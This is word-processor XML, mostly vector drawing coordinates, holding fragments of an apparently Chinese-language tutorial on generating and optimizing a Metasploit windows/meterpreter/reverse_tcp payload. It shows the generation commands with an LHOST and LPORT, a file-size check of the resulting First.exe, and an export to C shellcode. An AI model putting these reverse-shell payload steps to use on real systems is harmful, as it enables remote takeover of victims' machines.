07,1745,5307,1739,5307,1733,5307,1726,5307,1720e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:108.500pt;margin-top:120.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2170,2410" coordsize="130,270">
        <v:shape style="position:absolute;left:2170;top:2410;width:130;height:270" coordorigin="2170,2410" coordsize="130,270" path="m2185,2425l2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2185,2425,2186,2425,2186,2425,2186,2425,2186,2425,2186,2425,2186,2425,2186,2425,2186,2425,2186,2425,2187,2425,2187,2425,2187,2425,2187,2425,2187,2425,2187,2425,2188,2425,2188,2425,2188,2425,2188,2425,2189,2425,2189,2425,2189,2425,2190,2425,2190,2425,2190,2425,2191,2425,2191,2425,2192,2425,2192,2425,2192,2425,2193,2425,2193,2425,2194,2425,2195,2425,2195,2425,2196,2425,2196,2425,2197,2425,2198,2425,2198,2425,2199,2425,2200,2425,2200,2425,2201,2425,2202,2425,2203,2425,2204,2425,2205,2425,2206,2425,2207,2425,2208,2425,2209,2425,2210,2425,2211,2425,2212,2425,2213,2425,2214,2425,2215,2425,2216,2425,2218,2425,2219,2425,2220,2425,2222,2425,2223,2425,2224,2425,2226,2425,2227,2425,2229,2425,2230,2425,2232,2425,2234,2425,2235,2425,2237,2425,2239,2425,2241,2425,2242,2425,2244,2425,2246,2425,2248,2425,2250,2425,2252,2425,2254,2425,2256,2425,2259,2425,2261,2425,2263,2425,2265,2425,2268,2425,2270,2425,2272,2425,2275,2425,2277,2425,2280,2425,2283,2425,2285,2425,2288,2425,2291,2425,2293,2425,2296,2425,2299,2425,2302,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2425,2305,2426,2305,2426,2305,2426,2305,2426,2305,2426,2305,2426,2305,2426,2305,2426,2305,2427,2305,2427,2305,2427,2305,2427,2305,2428,2305,2428,2305,2428,2305,2429,2305,2429,2305,2429,2305,2430,2305,2430,2305,2431,2305,2431,2305,2432,2305,2432,2305,2433,2305,2434,2305,2434,2305,2435,2305,2436,2305,2436,2305,2437,2305,2438,2305,2439,2305,2440,2305,2441,2305,2442,2305,2443,2305,2444,2305,2445,2305,2447,2305,2448,2305,2449,2305,2450,2305,2452,2305,2453,2305,2455,2305,2456,2305,2458,2305,2460,2305,2461,2305,2463,2305,2465,2305,2467,2305,2469,2305,2471,2305,2473,2305,2475,2305,2477,2305,2479,2305,2482,2305,2484,2305,2487,2305,2489,2305,2492,2305,2494,2305,2497,2305,2500,2305,2503,2305,2506,2305,2509,2305,2512,2305,2515,2305,2518,2305,2522,2305,2525,2305,2528,2305,2532,2305,2536,2305,2539,2305,2543,2305,2547,2305,2551,2305,2555,2305,2559,2305,2563,2305,2568,2305,2572,2305,2577,2305,2581,2305,2586,2305,2591,2305,2596,2305,2600,2305,2606,2305,2611,2305,2616,2305,2621,2305,2627,2305,2632,2305,2638,2305,2644,2305,2650,2305,2655,2305,2662,2305,2668,2305,2674,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2305,2680,2304,2680,2304,2680,2304,2680,2304,2680,2304,2680,2304,2680,2304,2680,2303,2680,2303,2680,2303,2680,2303,2680,2303,2680,2302,2680,2302,2680,2302,2680,2302,2680,2301,2680,2301,2680,2301,2680,2300,2680,2300,2680,2299,2680,2299,2680,2299,2680,2298,2680,2298,2680,2297,2680,2297,2680,2296,2680,2296,2680,2295,2680,2295,2680,2294,2680,2293,2680,2293,2680,2292,2680,2291,2680,2291,2680,2290,2680,2289,2680,2288,2680,2287,2680,2286,2680,2286,2680,2285,2680,2284,2680,2283,2680,2282,2680,2281,2680,2280,2680,2279,2680,2277,2680,2276,2680,2275,2680,2274,2680,2273,2680,2271,2680,2270,2680,2269,2680,2267,2680,2266,2680,2264,2680,2263,2680,2261,2680,2260,2680,2258,2680,2257,2680,2255,2680,2253,2680,2251,2680,2250,2680,2248,2680,2246,2680,2244,2680,2242,2680,2240,2680,2238,2680,2236,2680,2234,2680,2232,2680,2230,2680,2227,2680,2225,2680,2223,2680,2220,2680,2218,2680,2215,2680,2213,2680,2210,2680,2208,2680,2205,2680,2202,2680,2200,2680,2197,2680,2194,2680,2191,2680,2188,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2680,2185,2679,2185,2679,2185,2679,2185,2679,2185,2679,2185,2679,2185,2678,2185,2678,2185,2678,2185,2677,2185,2677,2185,2677,2185,2676,2185,2676,2185,2675,2185,2675,2185,2674,2185,2674,2185,2673,2185,2673,2185,2672,2185,2671,2185,2671,2185,2670,2185,2669,2185,2668,2185,2667,2185,2667,2185,2666,2185,2665,2185,2664,2185,2663,2185,2661,2185,2660,2185,2659,2185,2658,2185,2657,2185,2655,2185,2654,2185,2652,2185,2651,2185,2649,2185,2648,2185,2646,2185,2644,2185,2642,2185,2641,2185,2639,2185,2637,2185,2635,2185,2633,2185,2631,2185,2628,2185,2626,2185,2624,2185,2621,2185,2619,2185,2616,2185,2614,2185,2611,2185,2609,2185,2606,2185,2603,2185,2600,2185,2597,2185,2594,2185,2591,2185,2587,2185,2584,2185,2581,2185,2577,2185,2574,2185,2570,2185,2566,2185,2562,2185,2559,2185,2555,2185,2551,2185,2546,2185,2542,2185,2538,2185,2533,2185,2529,2185,2524,2185,2520,2185,2515,2185,2510,2185,2505,2185,2500,2185,2495,2185,2490,2185,2484,2185,2479,2185,2473,2185,2468,2185,2462,2185,2456,2185,2450,2185,2444,2185,2438,2185,2432,2185,2425e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:174.600pt;width:467.400pt;height:257.399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23</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="11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24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542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26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="13" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="386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Started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reverse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28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p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ayload生成：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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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tmp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#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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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windows/meterpreter/reverse_tcp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LHOST=192.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168.1.5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LPORT=53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‐b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'\x00'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‐f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First.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="357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原始pay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load大小如下：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7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3802字节，大概在72KB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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="7"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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: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tmp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>#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du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‐sb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First.exe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980053"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>73802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First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exe</w:t>
      </w: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第一次优化p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ayload：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提取windows/meterpreter/reverse_tcp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shellcode</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="37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root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="ec9800"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>@John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tmp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#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8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐p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windows/meterpreter/reverse_tcp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LHOST=192.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168.1.5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LPORT=53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‐b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'\x00'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‐f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c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689.322pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,0" coordsize="0,13786">
        <v:shape style="position:absolute;left:10402;top:0;width:0;height:13786" coordorigin="10402,0" coordsize="0,13786" path="m10402,0l10402,0,10402,0,10402,0,10402,0,10402,0,10402,1,10402,1,10402,2,10402,4,10402,5,10402,8,10402,10,10402,14,10402,17,10402,22,10402,27,10402,33,10402,40,10402,47,10402,56,10402,65,10402,75,10402,87,10402,99,10402,113,10402,127,10402,143,10402,161,10402,179,10402,199,10402,220,10402,243,10402,268,10402,294,10402,321,10402,350,10402,381,10402,414,10402,448,10402,485,10402,523,10402,563,10402,606,10402,650,10402,696,10402,745,10402,796,10402,849,10402,904,10402,962,10402,1022,10402,1085,10402,1150,10402,1217,10402,1288,10402,1361,10402,1436,10402,1515,10402,1596,10402,1680,10402,1767,10402,1856,10402,1949,10402,2045,10402,2144,10402,2246,10402,2352,10402,2460,10402,2572,10402,2687,10402,2806,10402,2928,10402,3053,10402,3182,10402,3315,10402,3451,10402,3591,10402,3734,10402,3882,10402,4033,10402,4188,10402,4347,10402,4510,10402,4677,10402,4848,10402,5024,10402,5203,10402,5387,10402,5575,10402,5767,10402,5964,10402,6165,10402,6370,10402,6580,10402,6795,10402,7014,10402,7238,10402,7466,10402,7699,10402,7938,10402,8181,10402,8428,10402,8681,10402,8939,10402,9202,10402,9470,10402,9743,10402,10022,10402,10305,10402,10594,10402,10889,10402,11188,10402,11493,10402,11804,10402,12120,10402,12442,10402,12769,10402,13102,10402,13441,10402,13786e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:48.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,970" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:970;width:8990;height:670" coordorigin="1490,970" coordsize="8990,6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1,10484,1001,10484,1001,10484,1001,10484,1002,10484,1002,10484,1003,10484,1003,10484,1004,10484,1004,10484,1005,10484,1005,10484,1006,10484,1007,10484,1008,10484,1009,10484,1010,10484,1011,10484,1012,10484,1013,10484,1015,10484,1016,10484,1017,10484,1019,10484,1021,10484,1022,10484,1024,10484,1026,10484,1028,10484,1030,10484,1032,10484,1034,10484,1037,10484,1039,10484,1042,10484,1045,10484,1047,10484,1050,10484,1053,10484,1057,10484,1060,10484,1063,10484,1067,10484,1070,10484,1074,10484,1078,10484,1082,10484,1086,10484,1091,10484,1095,10484,1100,10484,1105,10484,1110,10484,1115,10484,1120,10484,1125,10484,1131,10484,1137,10484,1142,10484,1148,10484,1155,10484,1161,10484,1168,10484,1174,10484,1181,10484,1188,10484,1196,10484,1203,10484,1211,10484,1218,10484,1226,10484,1235,10484,1243,10484,1252,10484,1260,10484,1269,10484,1279,10484,1288,10484,1298,10484,1308,10484,1318,10484,1328,10484,1338,10484,1349,10484,1360,10484,1371,10484,1382,10484,1394,10484,1406,10484,1418,10484,1430,10484,1443,10484,1456,10484,1469,10484,1482,10484,1495,10484,1509,10484,1523,10484,1538,10484,1552,10484,1567,10484,1582,10484,1597,10484,1613,10484,1629,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10483,1645,10482,1645,10482,1645,10480,1645,10479,1645,10477,1645,10475,1645,10473,1645,10470,1645,10466,1645,10462,1645,10458,1645,10453,1645,10448,1645,10442,1645,10435,1645,10428,1645,10419,1645,10411,1645,10401,1645,10391,1645,10379,1645,10367,1645,10354,1645,10340,1645,10326,1645,10310,1645,10293,1645,10275,1645,10256,1645,10236,1645,10215,1645,10192,1645,10168,1645,10143,1645,10117,1645,10090,1645,10061,1645,10031,1645,9999,1645,9966,1645,9931,1645,9895,1645,9858,1645,9819,1645,9778,1645,9735,1645,9691,1645,9646,1645,9598,1645,9549,1645,9498,1645,9445,1645,9391,1645,9334,1645,9275,1645,9215,1645,9153,1645,9088,1645,9022,1645,8953,1645,8883,1645,8810,1645,8735,1645,8658,1645,8578,1645,8497,1645,8413,1645,8326,1645,8238,1645,8146,1645,8053,1645,7957,1645,7859,1645,7758,1645,7654,1645,7548,1645,7439,1645,7328,1645,7214,1645,7097,1645,6977,1645,6855,1645,6730,1645,6602,1645,6471,1645,6337,1645,6201,1645,6061,1645,5918,1645,5773,1645,5624,1645,5472,1645,5317,1645,5159,1645,4997,1645,4833,1645,4665,1645,4494,1645,4319,1645,4141,1645,3960,1645,3776,1645,3587,1645,3396,1645,3201,1645,3002,1645,2800,1645,2594,1645,2385,1645,2172,1645,1955,1645,1734,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1644,1510,1643,1510,1643,1510,1643,1510,1642,1510,1642,1510,1641,1510,1641,1510,1640,1510,1640,1510,1639,1510,1638,1510,1637,1510,1636,1510,1635,1510,1634,1510,1633,1510,1632,1510,1631,1510,1630,1510,1628,1510,1627,1510,1625,1510,1624,1510,1622,1510,1620,1510,1618,1510,1616,1510,1614,1510,1612,1510,1610,1510,1608,1510,1605,1510,1602,1510,1600,1510,1597,1510,1594,1510,1591,1510,1588,1510,1585,1510,1581,1510,1578,1510,1574,1510,1570,1510,1566,1510,1562,1510,1558,1510,1554,1510,1549,1510,1544,1510,1540,1510,1535,1510,1530,1510,1524,1510,1519,1510,1513,1510,1508,1510,1502,1510,1496,1510,1490,1510,1483,1510,1477,1510,1470,1510,1463,1510,1456,1510,1449,1510,1441,1510,1434,1510,1426,1510,1418,1510,1410,1510,1401,1510,1393,1510,1384,1510,1375,1510,1366,1510,1356,1510,1347,1510,1337,1510,1327,1510,1316,1510,1306,1510,1295,1510,1284,1510,1273,1510,1262,1510,1250,1510,1238,1510,1226,1510,1214,1510,1202,1510,1189,1510,1176,1510,1162,1510,1149,1510,1135,1510,1121,1510,1107,1510,1092,1510,1077,1510,1062,1510,1047,1510,1031,1510,1016,1510,1000e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:49.500pt;width:1.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,990" coordsize="30,650">
        <v:shape style="position:absolute;left:1490;top:990;width:30;height:650" coordorigin="1490,990" coordsize="30,650" path="m1517,1000l1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1000,1517,1001,1517,1001,1517,1001,1517,1001,1517,1002,1517,1002,1517,1003,1517,1003,1517,1004,1517,1004,1517,1005,1517,1005,1517,1006,1517,1007,1517,1008,1517,1009,1517,1010,1517,1011,1517,1012,1517,1013,1517,1015,1517,1016,1517,1017,1517,1019,1517,1021,1517,1022,1517,1024,1517,1026,1517,1028,1517,1030,1517,1032,1517,1034,1517,1037,1517,1039,1517,1042,1517,1045,1517,1047,1517,1050,1517,1053,1517,1057,1517,1060,1517,1063,1517,1067,1517,1070,1517,1074,1517,1078,1517,1082,1517,1086,1517,1091,1517,1095,1517,1100,1517,1105,1517,1110,1517,1115,1517,1120,1517,1125,1517,1131,1517,1137,1517,1142,1517,1148,1517,1155,1517,1161,1517,1168,1517,1174,1517,1181,1517,1188,1517,1196,1517,1203,1517,1211,1517,1218,1517,1226,1517,1235,1517,1243,1517,1252,1517,1260,1517,1269,1517,1279,1517,1288,1517,1298,1517,1308,1517,1318,1517,1328,1517,1338,1517,1349,1517,1360,1517,1371,1517,1382,1517,1394,1517,1406,1517,1418,1517,1430,1517,1443,1517,1456,1517,1469,1517,1482,1517,1495,1517,1509,1517,1523,1517,1538,1517,1552,1517,1567,1517,1582,1517,1597,1517,1613,1517,1629,1517,1645e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:8990;height:370" coordorigin="1490,1630" coordsize="8990,370" path="m1510,1645l1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1510,1645,1511,1645,1512,1645,1512,1645,1514,1645,1515,1645,1517,1645,1519,1645,1521,1645,1524,1645,1528,1645,1532,1645,1536,1645,1541,1645,1546,1645,1552,1645,1559,1645,1566,1645,1575,1645,1583,1645,1593,1645,1603,1645,1615,1645,1627,1645,1640,1645,1654,1645,1668,1645,1684,1645,1701,1645,1719,1645,1738,1645,1758,1645,1780,1645,1802,1645,1826,1645,1851,1645,1877,1645,1904,1645,1933,1645,1963,1645,1995,1645,2028,1645,2063,1645,2099,1645,2136,1645,2175,1645,2216,1645,2259,1645,2303,1645,2348,1645,2396,1645,2445,1645,2496,1645,2549,1645,2604,1645,2660,1645,2719,1645,2779,1645,2841,1645,2906,1645,2972,1645,3041,1645,3112,1645,3184,1645,3259,1645,3336,1645,3416,1645,3498,1645,3582,1645,3668,1645,3757,1645,3848,1645,3941,1645,4037,1645,4136,1645,4236,1645,4340,1645,4446,1645,4555,1645,4666,1645,4780,1645,4897,1645,5017,1645,5139,1645,5264,1645,5392,1645,5523,1645,5657,1645,5793,1645,5933,1645,6076,1645,6222,1645,6370,1645,6522,1645,6677,1645,6835,1645,6997,1645,7161,1645,7329,1645,7500,1645,7675,1645,7853,1645,8034,1645,8219,1645,8407,1645,8598,1645,8793,1645,8992,1645,9194,1645,9400,1645,9609,1645,9823,1645,10039,1645,10260,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1645,10484,1646,10484,1646,10484,1646,10484,1646,10484,1646,10484,1647,10484,1647,10484,1647,10484,1647,10484,1648,10484,1648,10484,1649,10484,1649,10484,1650,10484,1650,10484,1651,10484,1651,10484,1652,10484,1653,10484,1653,10484,1654,10484,1655,10484,1656,10484,1657,10484,1658,10484,1659,10484,1660,10484,1661,10484,1662,10484,1663,10484,1664,10484,1666,10484,1667,10484,1668,10484,1670,10484,1672,10484,1673,10484,1675,10484,1677,10484,1678,10484,1680,10484,1682,10484,1684,10484,1687,10484,1689,10484,1691,10484,1693,10484,1696,10484,1698,10484,1701,10484,1704,10484,1706,10484,1709,10484,1712,10484,1715,10484,1718,10484,1721,10484,1725,10484,1728,10484,1731,10484,1735,10484,1739,10484,1742,10484,1746,10484,1750,10484,1754,10484,1758,10484,1763,10484,1767,10484,1772,10484,1776,10484,1781,10484,1786,10484,1790,10484,1796,10484,1801,10484,1806,10484,1811,10484,1817,10484,1822,10484,1828,10484,1834,10484,1840,10484,1846,10484,1852,10484,1859,10484,1865,10484,1872,10484,1878,10484,1885,10484,1892,10484,1899,10484,1907,10484,1914,10484,1922,10484,1929,10484,1937,10484,1945,10484,1953,10484,1961,10484,1970,10484,1978,10484,1987,10484,1996,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10483,2005,10482,2005,10482,2005,10480,2005,10479,2005,10477,2005,10475,2005,10473,2005,10470,2005,10466,2005,10462,2005,10458,2005,10453,2005,10448,2005,10442,2005,10435,2005,10428,2005,10419,2005,10411,2005,10401,2005,10391,2005,10379,2005,10367,2005,10354,2005,10340,2005,10326,2005,10310,2005,10293,2005,10275,2005,10256,2005,10236,2005,10215,2005,10192,2005,10168,2005,10143,2005,10117,2005,10090,2005,10061,2005,10031,2005,9999,2005,9966,2005,9931,2005,9895,2005,9858,2005,9819,2005,9778,2005,9735,2005,9691,2005,9646,2005,9598,2005,9549,2005,9498,2005,9445,2005,9391,2005,9334,2005,9275,2005,9215,2005,9153,2005,9088,2005,9022,2005,8953,2005,8883,2005,8810,2005,8735,2005,8658,2005,8578,2005,8497,2005,8413,2005,8326,2005,8238,2005,8146,2005,8053,2005,7957,2005,7859,2005,7758,2005,7654,2005,7548,2005,7439,2005,7328,2005,7214,2005,7097,2005,6977,2005,6855,2005,6730,2005,6602,2005,6471,2005,6337,2005,6201,2005,6061,2005,5918,2005,5773,2005,5624,2005,5472,2005,5317,2005,5159,2005,4997,2005,4833,2005,4665,2005,4494,2005,4319,2005,4141,2005,3960,2005,3776,2005,3587,2005,3396,2005,3201,2005,3002,2005,2800,2005,2594,2005,2385,2005,2172,2005,1955,2005,1734,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2004,1510,2004,1510,2004,1510,2004,1510,2004,1510,2004,1510,2003,1510,2003,1510,2003,1510,2002,1510,2002,1510,2002,1510,2001,1510,2001,1510,2000,1510,2000,1510,1999,1510,1999,1510,1998,1510,1997,1510,1997,1510,1996,1510,1995,1510,1994,1510,1993,1510,1992,1510,1991,1510,1990,1510,1989,1510,1988,1510,1987,1510,1986,1510,1984,1510,1983,1510,1981,1510,1980,1510,1978,1510,1977,1510,1975,1510,1973,1510,1971,1510,1969,1510,1967,1510,1965,1510,1963,1510,1961,1510,1959,1510,1956,1510,1954,1510,1952,1510,1949,1510,1946,1510,1944,1510,1941,1510,1938,1510,1935,1510,1932,1510,1929,1510,1925,1510,1922,1510,1918,1510,1915,1510,1911,1510,1907,1510,1904,1510,1900,1510,1896,1510,1891,1510,1887,1510,1883,1510,1878,1510,1874,1510,1869,1510,1864,1510,1859,1510,1854,1510,1849,1510,1844,1510,1839,1510,1833,1510,1827,1510,1822,1510,1816,1510,1810,1510,1804,1510,1798,1510,1791,1510,1785,1510,1778,1510,1771,1510,1765,1510,1758,1510,1750,1510,1743,1510,1736,1510,1728,1510,1721,1510,1713,1510,1705,1510,1697,1510,1688,1510,1680,1510,1671,1510,1663,1510,1654,1510,1645e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:81.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1630" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:1630;width:30;height:370" coordorigin="1490,1630" coordsize="30,370" path="m1517,1645l1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1645,1517,1646,1517,1646,1517,1646,1517,1646,1517,1646,1517,1647,1517,1647,1517,1647,1517,1647,1517,1648,1517,1648,1517,1649,1517,1649,1517,1650,1517,1650,1517,1651,1517,1651,1517,1652,1517,1653,1517,1653,1517,1654,1517,1655,1517,1656,1517,1657,1517,1658,1517,1659,1517,1660,1517,1661,1517,1662,1517,1663,1517,1664,1517,1666,1517,1667,1517,1668,1517,1670,1517,1672,1517,1673,1517,1675,1517,1677,1517,1678,1517,1680,1517,1682,1517,1684,1517,1687,1517,1689,1517,1691,1517,1693,1517,1696,1517,1698,1517,1701,1517,1704,1517,1706,1517,1709,1517,1712,1517,1715,1517,1718,1517,1721,1517,1725,1517,1728,1517,1731,1517,1735,1517,1739,1517,1742,1517,1746,1517,1750,1517,1754,1517,1758,1517,1763,1517,1767,1517,1772,1517,1776,1517,1781,1517,1786,1517,1790,1517,1796,1517,1801,1517,1806,1517,1811,1517,1817,1517,1822,1517,1828,1517,1834,1517,1840,1517,1846,1517,1852,1517,1859,1517,1865,1517,1872,1517,1878,1517,1885,1517,1892,1517,1899,1517,1907,1517,1914,1517,1922,1517,1929,1517,1937,1517,1945,1517,1953,1517,1961,1517,1970,1517,1978,1517,1987,1517,1996,1517,2005e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:99.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1990" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1990;width:8990;height:390" coordorigin="1490,1990" coordsize="8990,390" path="m1510,2005l1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1510,2005,1511,2005,1512,2005,1512,2005,1514,2005,1515,2005,1517,2005,1519,2005,1521,2005,1524,2005,1528,2005,1532,2005,1536,2005,1541,2005,1546,2005,1552,2005,1559,2005,1566,2005,1575,2005,1583,2005,1593,2005,1603,2005,1615,2005,1627,2005,1640,2005,1654,2005,1668,2005,1684,2005,1701,2005,1719,2005,1738,2005,1758,2005,1780,2005,1802,2005,1826,2005,1851,2005,1877,2005,1904,2005,1933,2005,1963,2005,1995,2005,2028,2005,2063,2005,2099,2005,2136,2005,2175,2005,2216,2005,2259,2005,2303,2005,2348,2005,2396,2005,2445,2005,2496,2005,2549,2005,2604,2005,2660,2005,2719,2005,2779,2005,2841,2005,2906,2005,2972,2005,3041,2005,3112,2005,3184,2005,3259,2005,3336,2005,3416,2005,3498,2005,3582,2005,3668,2005,3757,2005,3848,2005,3941,2005,4037,2005,4136,2005,4236,2005,4340,2005,4446,2005,4555,2005,4666,2005,4780,2005,4897,2005,5017,2005,5139,2005,5264,2005,5392,2005,5523,2005,5657,2005,5793,2005,5933,2005,6076,2005,6222,2005,6370,2005,6522,2005,6677,2005,6835,2005,6997,2005,7161,2005,7329,2005,7500,2005,7675,2005,7853,2005,8034,2005,8219,2005,8407,2005,8598,2005,8793,2005,8992,2005,9194,2005,9400,2005,9609,2005,9823,2005,10039,2005,10260,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2005,10484,2006,10484,2006,10484,2006,10484,2006,10484,2006,10484,2007,10484,2007,10484,2007,10484,2007,10484,2008,10484,2008,10484,2008,10484,2009,10484,2009,10484,2010,10484,2010,10484,2011,10484,2012,10484,2012,10484,2013,10484,2014,10484,2015,10484,2015,10484,2016,10484,2017,10484,2018,10484,2019,10484,2020,10484,2022,10484,2023,10484,2024,10484,2025,10484,2027,10484,2028,10484,2030,10484,2031,10484,2033,10484,2035,10484,2036,10484,2038,10484,2040,10484,2042,10484,2044,10484,2046,10484,2048,10484,2051,10484,2053,10484,2056,10484,2058,10484,2061,10484,2063,10484,2066,10484,2069,10484,2072,10484,2075,10484,2078,10484,2081,10484,2085,10484,2088,10484,2092,10484,2095,10484,2099,10484,2103,10484,2107,10484,2111,10484,2115,10484,2119,10484,2123,10484,2128,10484,2132,10484,2137,10484,2142,10484,2147,10484,2152,10484,2157,10484,2162,10484,2167,10484,2173,10484,2178,10484,2184,10484,2190,10484,2196,10484,2202,10484,2208,10484,2215,10484,2221,10484,2228,10484,2234,10484,2241,10484,2248,10484,2255,10484,2263,10484,2270,10484,2278,10484,2285,10484,2293,10484,2301,10484,2310,10484,2318,10484,2326,10484,2335,10484,2344,10484,2353,10484,2362,10484,2371,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10484,2380,10483,2380,10482,2380,10482,2380,10480,2380,10479,2380,10477,2380,10475,2380,10473,2380,10470,2380,10466,2380,10462,2380,10458,2380,10453,2380,10448,2380,10442,2380,10435,2380,10428,2380,10419,2380,10411,2380,10401,2380,10391,2380,10379,2380,10367,2380,10354,2380,10340,2380,10326,2380,10310,2380,10293,2380,10275,2380,10256,2380,10236,2380,10215,2380,10192,2380,10168,2380,10143,2380,10117,2380,10090,2380,10061,2380,10031,2380,9999,2380,9966,2380,9931,2380,9895,2380,9858,2380,9819,2380,9778,